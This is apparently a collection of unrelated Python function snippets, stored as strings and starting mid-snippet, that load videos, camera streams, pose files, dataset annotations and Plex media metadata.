json.load(f)\n\n # Load human pose features (theta; 72 points)\n if self.cfg.MODEL.USE_HUMAN_POSES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses...')\n import pickle\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path), 'rb') as f:\n self._human_poses = pickle.load(f)\n elif self.cfg.MODEL.USE_SPA_CONF:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses for spatial configuration module...')\n self._human_poses_root = os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path)\n\n # Loading frame paths.\n (\n self._image_paths,\n self._video_idx_to_name,\n ) = vidor_helper.load_image_lists(cfg, is_train=(self._split == \"train\"))\n\n # Loading annotations for boxes and labels.\n self._instances = vidor_helper.load_boxes_and_labels(\n cfg, mode=self._split\n )\n\n # Get indices of keyframes and corresponding boxes and labels.\n (\n self._keyframe_indices,\n self._keyframe_boxes_and_labels,\n ) = vidor_helper.get_keyframe_data(cfg, self._instances, mode=self._split)\n\n # import pdb; pdb.set_trace()\n\n # Calculate the number of used boxes.\n self._num_boxes_used = vidor_helper.get_num_boxes_used(\n self._keyframe_indices, self._keyframe_boxes_and_labels\n )\n\n self.print_summary()\n\n def debug(idx):\n pass\n\n if cfg.VIDOR.TEST_DEBUG:\n debug(0)\n # pass", "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexHistory._loadData(self, data)", "def get_data(self):\n global CAM\n while CAM.isOpened():\n _, frame = CAM.read()\n _, jpeg = cv2.imencode('.jpg', frame)\n 
encoded_img = \"data:image/jpg;base64,\" + str(base64.b64encode(jpeg.tobytes()).decode())\n SIO.emit('video_frame',\n {'frame': encoded_img},\n namespace='/live-stream')\n sleep(self.delay)", "def load_vid_frame(self, ind, camname, preload=True, extension=\".mp4\"):\n fname = (\n str(self._N_VIDEO_FRAMES * int(np.floor(ind / self._N_VIDEO_FRAMES)))\n + extension\n )\n frame_num = int(ind % self._N_VIDEO_FRAMES)\n keyname = os.path.join(camname, fname)\n if preload:\n return self.vidreaders[camname][keyname].get_data(frame_num)\n else:\n thisvid_name = self.vidreaders[camname][keyname]\n abname = thisvid_name.split(\"/\")[-1]\n if abname == self.currvideo_name[camname]:\n vid = self.currvideo[camname]\n else:\n vid = imageio.get_reader(thisvid_name)\n print(\"Loading new video: {} for {}\".format(abname, camname))\n self.currvideo_name[camname] = abname\n # close current vid\n # Without a sleep here, ffmpeg can hang on video close\n time.sleep(0.25)\n if self.currvideo[camname] is not None:\n self.currvideo[camname].close()\n self.currvideo[camname] = vid\n\n im = vid.get_data(frame_num)\n\n return im", "def loadData(path,filename):\n\tfilepath = path + filename\n\ttry:\n\t\t#print('try1')\n\t\twith open(filepath+\".pickle\",\"rb\") as handle:\n\t\t\tallVideoData = pickle.load(handle)\n\t\ttry:\n\t\t\tmetadata = allVideoData[0]\n\t\t\tdata = allVideoData[1]\n\t\texcept:\n\t\t\tmetadata = allVideoData\n\t\t\tdata = __initializeData()\n\t\t\tprint(\"WARNING\")\n\t\t\tprint(\"warning: no data attached to metadata, initializing empty set\")\n\t\t\ttime.sleep(1)\n\t\treturn metadata,data\n\texcept:\n\t\tprint('no file {} exists yet'.format(filepath+\".pickle\"))\n\t\tprint('if writeMetadata has already been used, be sure to save it with saveData()')\n\t\ttime.sleep(1)\n\t\tmetadata = False\n\t\treturn metadata,__initializeData()", "def load_data(self) -> None:", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.countries = self.findItems(data, media.Country)\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.editionTitle = data.attrib.get('editionTitle')\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.primaryExtraKey = data.attrib.get('primaryExtraKey')\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratingImage = data.attrib.get('ratingImage')\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.similar = self.findItems(data, media.Similar)\n self.studio 
= data.attrib.get('studio')\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))", "def load(self) -> None:\n self._load_data()\n self._load_poses()\n self._load_timestamps()", "def LoadAirplane():\n return vtkInterface.PolyData(planefile)", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.autoDeletionItemPolicyUnwatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyUnwatchedLibrary', '0'))\n self.autoDeletionItemPolicyWatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyWatchedLibrary', '0'))\n self.childCount = utils.cast(int, data.attrib.get('childCount'))\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.episodeSort = utils.cast(int, data.attrib.get('episodeSort', '-1'))\n self.flattenSeasons = utils.cast(int, data.attrib.get('flattenSeasons', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.locations = self.listAttrs(data, 'path', etag='Location')\n self.network = data.attrib.get('network')\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.seasonCount = utils.cast(int, data.attrib.get('seasonCount', self.childCount))\n self.showOrdering = data.attrib.get('showOrdering')\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexSession._loadData(self, data)", "def load_poses(self):\n print('Loading poses for sequence ' + self.sequence + '...')\n\n pose_file = os.path.join(self.pose_path, self.sequence + '.txt')\n\n # Read and parse the poses\n try:\n self.T_w_cam0 = []\n with open(pose_file, 'r') as f:\n for line in f.readlines():\n T = np.fromstring(line, dtype=float, sep=' ')\n T = T.reshape(3, 4)\n T = np.vstack((T, [0, 0, 0, 1]))\n 
self.T_w_cam0.append(T)\n print('done.')\n\n except FileNotFoundError:\n print('Ground truth poses are not avaialble for sequence ' +\n self.sequence + '.')", "def load_video(self):\n self.video_file = tkFileDialog.askopenfilename()\n self.video_parser = VideoFileParser(self.video_file)\n\n self.video_entries = self.video_parser.entries\n\n for index, entry in enumerate(self.video_entries):\n self.video_box.insert(index, entry.word)", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexHistory._loadData(self, data)", "def loadVideo(self,path,loadAudio=True):\r\n self.aud_path = \"\"\r\n # Get cv2 video capture object\r\n self.vid_path = path\r\n self.vid = cv2.VideoCapture(self.vid_path)\r\n self.delay = int(1000/self.vid.get(cv2.CAP_PROP_FPS))\r\n self.vid_len = int(self.vid.get(cv2.CAP_PROP_FRAME_COUNT))/self.vid.get(cv2.CAP_PROP_FPS)\r\n self.state = VideoPlayer.State.STOPPED\r\n self.hasAudio = True# If no audio in video, ignore audio\r\n if loadAudio:\r\n self.loadAudio(self.vid_path)\r\n else:\r\n self.loadCachedAudio()", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n frame_dir = video_info['filename']\n video_info['filename'] = osp.join(self.data_prefix, video_info['filename'])\n video_info['frame_dir'] = frame_dir\n video_info['index'] = i\n \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def load_video_data(fpath):\n videos = []\n with open(fpath) as f:\n d1 = json.load(f)['items']\n videos += append_videos(d1)\n return videos", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._seasonNumber = None # cached season number\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.grandparentArt = data.attrib.get('grandparentArt')\n self.grandparentGuid = data.attrib.get('grandparentGuid')\n self.grandparentKey = data.attrib.get('grandparentKey')\n self.grandparentRatingKey = utils.cast(int, data.attrib.get('grandparentRatingKey'))\n self.grandparentTheme = data.attrib.get('grandparentTheme')\n self.grandparentThumb = data.attrib.get('grandparentThumb')\n self.grandparentTitle = data.attrib.get('grandparentTitle')\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.labels = self.findItems(data, media.Label)\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.parentYear = utils.cast(int, data.attrib.get('parentYear'))\n self.producers = 
self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.skipParent = utils.cast(bool, data.attrib.get('skipParent', '0'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))\n\n # If seasons are hidden, parentKey and parentRatingKey are missing from the XML response.\n # https://forums.plex.tv/t/parentratingkey-not-in-episode-xml-when-seasons-are-hidden/300553\n if self.skipParent and data.attrib.get('parentRatingKey') is None:\n # Parse the parentRatingKey from the parentThumb\n if self.parentThumb and self.parentThumb.startswith('/library/metadata/'):\n self.parentRatingKey = utils.cast(int, self.parentThumb.split('/')[3])\n # Get the parentRatingKey from the season's ratingKey\n if not self.parentRatingKey and self.grandparentRatingKey:\n self.parentRatingKey = self.show().season(season=self.parentIndex).ratingKey\n if self.parentRatingKey:\n self.parentKey = f'/library/metadata/{self.parentRatingKey}'", "def process_video(self):\n if os.path.isfile(self.source):\n self.cap = cv2.VideoCapture(self.source)\n else:\n try:\n file_name = \"input.mp4\"\n self.source = self.source.replace('open', 'uc')\n print( \"\\nDownloading video file from drive link to %s\\n\"%file_name)\n gdown.download(self.source, file_name, quiet=False)\n print( \"%s downloaded!\\n\"%file_name )\n self.cap = cv2.VideoCapture(file_name)\n except Exception:\n raise RuntimeError(\"Invalid source input, please specify a Google drive link or a downloaded local file as input \\n\")\n\n\n assert self.cap.isOpened(), \"Failed to open %s\" % self.source\n\n self.w = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n self.h = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n self.fps = self.cap.get(cv2.CAP_PROP_FPS) \n self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))\n return", "def load_data(self):", "def video_config(FILENAME):\n\n\tcap = cv2.VideoCapture(FILENAME)\n\twhile not cap.isOpened():\n\t cap = cv2.VideoCapture(FILENAME)\n\t cv2.waitKey(1000)\n\t print \"Wait for the header\"\n\tpos_frame = cap.get(cv2.cv.CV_CAP_PROP_POS_FRAMES)\n\t\n\treturn cap, pos_frame", "def load_pose(color_dir, view, depth_scale, device):\n pose_file = os.path.join(color_dir, '%05d.pose' % view)\n if os.path.exists(pose_file):\n with open(pose_file, \"rb\") as fh:\n pose = pickle.load(fh)\n pose[:3,3:] *= depth_scale\n pose = torch.tensor(\n np.concatenate(\n (pose, np.array([0, 0, 0, 1]).reshape(1, 4)),\n axis=0\n ),\n dtype=torch.float32,\n device=device,\n )\n else:\n error(\"Pose file '%s' does not exist.\" % pose_file)\n return pose", "def get_video_data(self):\n\t\tfeature_str = 'fdhh' if self.fdhh else 'pca'\n\t\tif self.options.mode == 'test':\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_test_{feature_str}.pic')\n\t\telse:\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_dev_{feature_str}.pic')\n\t\t\t\n\t\t# Return saved features if exist:\n\t\tif not self.options.save_features and os.path.exists(f'{feature_path[0]}/{feature_path[1]}'):\n\t\t\tX_train, X_test = load_from_file(f'{feature_path[0]}/{feature_path[1]}')\n\t\telse:\n\t\t\tX_train, X_test = self.get_train_test()\n\t\t\t'''X_train, X_test = scale(X_train, X_test, scale_type='standard', axis=0, use_boxcox=True, boxcox_axis=0,\n\t\t\t use_pandas=True, 
verbose=self.options.verbose)'''\n\t\t\tX_train, X_test = scale(X_train, X_test, scale_type='minmax', axis=0, use_pandas=True,\n\t\t\t verbose=self.options.verbose)\n\t\t\tif self.fdhh:\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint('Performing FDHH over train and test set...')\n\t\t\t\tX_train = X_train.groupby(level=0).apply(self.FDHH)\n\t\t\t\tX_test = X_test.groupby(level=0).apply(self.FDHH)\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint(f'Sparsity in Train fdhh = {np.sum(X_train.values == 0) / X_train.size}')\n\t\t\t\t\tprint(f'Sparsity in Test fdhh = {np.sum(X_test.values == 0) / X_test.size}')\n\t\t\telse:\n\t\t\t\tX_train, X_test = self.video_pca(X_train, X_test)\n\t\t\t\t\n\t\tif self.options.save_features:\n\t\t\tsave_to_file(feature_path[0], feature_path[1], (X_train, X_test))\n\t\t\tself.options.save_features = False\n\t\t\n\t\tif not self.fdhh:\n\t\t\tX_train = self.split_videos(X_train)\n\t\t\tX_test = self.split_videos(X_test)\n\t\t\t\n\t\treturn [X_train, X_test]", "def openVideo(self):\n fname = self.openFile(self.user[\"Video\"])\n if fname != \"\":\n error_opening_video = False\n\n cam = cv2.VideoCapture(fname)\n logging.info(\"Opening video Check: {0}\".format(fname))\n\n currentframe = 0\n ret, frame = cam.read()\n\n if ret is False:\n error_opening_video = True\n # Release all space and windows once done\n cam.release()\n cv2.destroyAllWindows()\n\n if error_opening_video:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Error on opening the video: {0}\".format(fname))\n msg.setWindowTitle(\"Information\")\n msg.setStandardButtons(QMessageBox.Ok)\n msg.exec_()\n else:\n self.user[\"Video\"] = fname\n name = self.splitPath(fname)[-1]\n self.vid_name = name.split(\".\")[0]\n self.ui.l_vid.setText(\"Load: \" + self.vid_name)\n self.checkFiles()", "def init_video(self):\n\n assert self.container is None\n\n retry = 3\n while self.container is None and 0 < retry:\n retry -= 1\n try:\n self.container = av.open(self.tello.get_video_stream())\n except av.AVError as ave:\n print(ave)\n print('retry...')\n\n\n assert self.container is not None", "def load(self):\n if self.ref == None:\n self.ref = av.open(self.abspath)\n self.n_audio_streams = len([s for s in self.ref.streams if s.type == 'audio'])\n self.n_video_streams = len([s for s in self.ref.streams if s.type == 'video'])\n if self.n_audio_streams > 0:\n self.media_types += ['audio']\n if self.n_video_streams > 0:\n self.media_types += ['video']\n self.duration = self.ref.duration / self.AV_TIME_BASE", "def parse():\n all_players = list(FACE_IMAGE_LOCATIONS.keys())\n face_encodings = VideoParser.__load_faces_encodings(all_players)\n player_occurrences = VideoParser.__get_player_occurrences(all_players, face_encodings)\n VideoParser.__save_parsed_video(player_occurrences)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']+'.avi') \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']] \n else:\n if not self.test_ret:\n video_info['text'] = [rnd.choice(video_info['text'])]\n else:\n video_info['clip_text_candidate'] = 
list(range(len(video_info['text'])))\n\n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.collections = self.findItems(data, media.Collection)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentStudio = data.attrib.get('parentStudio')\n self.parentTheme = data.attrib.get('parentTheme')\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.ratings = self.findItems(data, media.Rating)\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def __init__(self, videoPath=\"\", cacheString=\"-cache\", faceDetector=None):\n self.videoPath = videoPath\n self.cacheString = cacheString\n self.video = None \n self.currentFrame = []\n self.currentFrameNumber = 0\n self.frameCount = 0 #total frame number\n self.fps = 25\n self.ret = True #if the video is over\n self.isPlaying = False\n self.ifDrawAxis = False\n self.ifDrawSquare = False\n self.cacheData = {}\n \n if videoPath != \"\":\n self.load()", "def load(self):\n Logger.info(\"VLCPlayer: Entering load\")\n self._load_player(self.source)\n self._set_volume(self.volume)", "def testLoadData(self):\n data = load_covid_data(file)\n assert type(data).__name__ == 'dict'", "def _read_file(self):\n extension = self.path.split('.')[-1]\n if extension!='avi':\n raise Exception(\"Invalid Format\")\n\n return cv2.VideoCapture(self.path)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n data = hload_pkl(self.ann_file)\n\n video_infos = []\n for video_info in data:\n filename = video_info['filename']\n if self.data_prefix is not None:\n filename = osp.join(self.data_prefix, filename)\n video_info['filename'] = filename\n label 
= video_info['label']\n if self.multi_class and isinstance(label, np.ndarray):\n video_info['label'] = label.astype(np.float32)\n\n video_infos.append(video_info)\n\n while len(video_infos) < self.min_video_num:\n left_num = min(self.min_video_num - len(video_infos), len(video_infos))\n video_infos.extend(random.sample(video_infos, left_num))\n return video_infos", "def loadVideo(self,path,loadAudio=False):\r\n self.videoPlayer.loadVideo(path,loadAudio=loadAudio)\r\n self.videoPath = path", "def loadData():\n\tprint \"Loading POS vectorized reviews\"\n\twith open(DATA_PATH, \"rb\") as data_file:\n\t\tdata = cPickle.load(data_file)\n\treturn data", "def get_camera_data_object(evt, src):\n o = evt.get(_psana.Camera.FrameV1, src)\n if o is not None: return o\n\n return None", "def open_video(self):\n\n # start the stream on the bebop\n if (self.is_bebop):\n self.drone_object.start_video_stream()\n\n # we have bypassed the old opencv VideoCapture method because it was unreliable for rtsp\n\n # get the path for the config files\n fullPath = inspect.getfile(DroneVisionGUI)\n shortPathIndex = fullPath.rfind(\"/\")\n if (shortPathIndex == -1):\n # handle Windows paths\n shortPathIndex = fullPath.rfind(\"\\\\\")\n print(shortPathIndex)\n shortPath = fullPath[0:shortPathIndex]\n self.imagePath = join(shortPath, \"images\")\n self.utilPath = join(shortPath, \"utils\")\n print(self.imagePath)\n print(self.utilPath)\n\n if self.is_bebop:\n # generate the streaming-address for the Bebop\n self.utilPath = join(shortPath, \"utils\")\n self.stream_adress = \"%s/bebop.sdp\" % self.utilPath\n else:\n # generate the streaming-address for the Mambo\n self.stream_adress = \"rtsp://192.168.99.1/media/stream2\"\n\n # initialise the vlc-player with the network-caching\n self.player = vlc.MediaPlayer(self.stream_adress, \":network-caching=\" + str(self.network_caching))\n\n # start the buffering\n success = self._start_video_buffering()", "def video_handle_for_demo():\n frame = cv2.imread(\"vision.png\")\n\n return frame", "def __init__(self, data, video_stream_url_provider):\n self._camera_id = data['id']\n self._name = data['name']\n self._is_enabled = data['enabled']\n self._recording_status = data['recStatus']\n self._video_stream_url = video_stream_url_provider(self.camera_id)", "def load_image_or_video(self):\n if self.guiParam['appType'] == 'Image Applications':\n self.data = self.load_image_source()\n\n else:\n raise ValueError(\n '[Error] Please select of the two Application pipelines')\n\n return self.data", "def get_session_videodata(videos):\n # Get first frame of first video for future processing and number of frames in each video\n videos_data = {'Frame rate': [], 'Number frames': []}\n for idx, videofile in enumerate(videos):\n cap = cv2.VideoCapture(videofile)\n videos_data['Frame rate'].append(cap.get(cv2.CAP_PROP_FPS))\n videos_data['Number frames'].append(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)))\n videos_data['Cumu. 
Num Frames'] = np.cumsum(videos_data['Number frames'])\n return videos_data", "def get_video_data(video_page_url):\n\tvideo_data = {}\n\tresponse = requests.get(video_page_url)\n\tsoup = bs4.BeautifulSoup(response.text)\n\tvideo_data['title'] = soup.select('title')[0].get_text()\n\t\n\t# careful with the encoding: otherwise it might fail on title like \"Dr med Schr(umlaut)fel Interview\" \n\t#print(u'\"{0}\"'.format(video_data['title']).encode('ascii', 'ignore'))\n\t\n\t# sometimes views are like \"42 views\" or \"2457\" with even CR/LF\n\ttry:\n\t\tvideo_data['views'] = int(re.sub('[^0-9]', '',\n\t soup.select('.watch-view-count')[0].get_text().split()[0]))\n\texcept:\n\t\t#print(\"Error fetching the view count for %s\" % video_data['title'].encode('ascii', 'ignore'))\n\t\tvideo_data['views'] = 0\n\n\t# sometimes likes / dislikes can be disabled...\n\tif soup.select('.likes-count'):\n\t\tvideo_data['likes'] = int(re.sub('[^0-9]', '',\n\t soup.select('.likes-count')[0].get_text().split()[0]))\n\t\tvideo_data['dislikes'] = int(re.sub('[^0-9]', '', \n\t soup.select('.dislikes-count')[0].get_text().split()[0]))\n\telse:\n\t\t#print(\"likes/dislikes not authorized for the video: %s\" % video_data['title'].encode('ascii', 'ignore'))\n\t\tvideo_data['likes'] = 0\n\t\tvideo_data['dislikes'] = 0\n\n\treturn video_data", "def load_stream_data(test_path, test_file=0):\n left_video_file = os.path.join(test_path + '/left_{:02d}.avi'.format(test_file))\n right_video_file = os.path.join(test_path + '/right_{:02d}.avi'.format(test_file))\n left_annotations_dir = os.path.join(test_path + '/left_{:02d}_json/*'.format(test_file))\n right_annotations_dir = os.path.join(test_path + '/right_{:02d}_json/*'.format(test_file))\n\n left_annotations = sorted(glob(left_annotations_dir))\n right_annotations = sorted(glob(right_annotations_dir))\n\n return left_video_file, right_video_file, left_annotations, right_annotations", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name'] if 'filename' not in video_info else video_info['filename']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers'] if 'answers' in video_info else video_info['text']\n info_dict['question'] = video_info['question'] if 'question' in video_info else \"\"\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def load_video(self, filename):\n \n reader = imageio.get_reader(filename, 'ffmpeg')\n \n return np.array(list(reader), dtype=np.float32)", "def readVideo(self):\n vid = cv2.VideoCapture(self.fname)\n imgstack = []\n # grab = True\n grab, img = vid.read()\n while grab:\n imgstack.append(\n Frame(\n cv2.cvtColor(img, cv2.COLOR_BGR2GRAY),\n self.starttime\n + datetime.timedelta(seconds=self.frame_dt * self.length),\n )\n )\n self.length += 1\n grab, img = vid.read()\n self.frames = imgstack", "def load_video(video_path, dim):\n videogen = skvideo.io.vreader(video_path)\n vid_data = []\n for frame in videogen:\n try:\n vid_data.append(scipy.misc.imresize(frame, dim))\n except:\n print len(vid_data)\n return np.array(vid_data)", "def generateDataFromVideo(path):\n video = cv2.VideoCapture(path)\n success, frame = video.read()\n cnt = 1\n wiperExist = 0\n file = open(file='annotation.txt', mode='w')\n\n while 
success:\n cv2.imwrite(filename='./data/{0}.jpg'.format(cnt), img=frame)\n cnt += 1\n success, frame = video.read()\n if (cnt - 4) % 37 == 0 or (wiperExist > 0):\n wiperExist = (wiperExist + 1) % 21\n file.write('./Dataset/data/{0}.jpg 1\\n'.format(cnt))\n else:\n file.write('./Dataset/data/{0}.jpg 0\\n'.format(cnt))", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers']\n info_dict['question'] = video_info['q']\n info_dict['subtitle'] = video_info['located_sub_text']\n info_dict['frame_ind'] = video_info['located_frame']\n info_dict['total_frames'] = video_info.get('total_frames', -1)\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def from_local(self):\n if self.local_annotations_filename is not None:\n with open(self.local_annotations_filename, 'r') as f:\n data = json.load(f)\n self.video_annotations = dl.AnnotationCollection.from_json(data['annotations'])", "def load_movie_trailer(self):\n self.trailer_youtube_url = tmdb.tmdb_client().get_movie_trailer_url(self.tmdb_id)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']]\n for text in video_info['text']:\n info = {}\n frame_dir = video_info['filename']\n filename = osp.join(self.data_prefix, video_info['filename']+'.mp4') \n info['filename'] = filename\n info['frame_dir'] = frame_dir\n info['index'] = i\n info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n info['text'] = [text]\n if self.is_ret:\n pass\n elif self.is_mc:\n info['clip_text_candidate'] = [0, 1, 2, 3, 4]\n elif self.is_qa:\n pass\n video_infos.append(info) \n del ann_info\n\n return video_infos", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexHistory._loadData(self, data)", "def load_frame_from_video(path: str, frame_index: int) -> np.ndarray:\n vid = load_video(path)\n img = vid[frame_index]\n return img", "def fetch_pyvideo_pk(self):\n url = 'http://pyvideo.org/search?models=videos.video&q={0}'.format(self.full_name.replace(\" \", \"+\"))\n soup = BeautifulSoup(requests.get(url).content).findAll(\"a\")\n if soup:\n for link in soup:\n if link.string == self.full_name:\n self.pyvideo_pk = link.get('href').split('/')[2]\n self.save()\n return self.pyvideo_pk\n 